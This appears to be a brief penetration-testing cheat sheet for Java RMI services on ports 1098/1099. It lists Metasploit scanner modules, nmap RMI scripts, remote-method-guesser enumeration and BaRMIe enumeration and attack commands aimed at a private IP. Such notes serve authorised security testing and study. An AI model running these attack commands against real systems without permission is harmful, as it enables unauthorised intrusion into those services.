Port 1098/1099- Pentesting Java RMI
Enumeration
msf> use auxiliary/scanner/misc/java_rmi_server
msf> use auxiliary/gather/java_rmi_registry
nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p <PORT> <IP>Remote Method Guesser
# remote-method-guesser
# https://github.com/qtc-de/remote-method-guesser
java -jar rmg-3.0.0-jar-with-dependencies.jar 192.168.1.11 1098 enumExploitation
$ java -jar BaRMIe.jar -enum 192.168.1.11 1098
$ java -jar BaRMIe.jar -attack 192.168.1.11 1098Last updated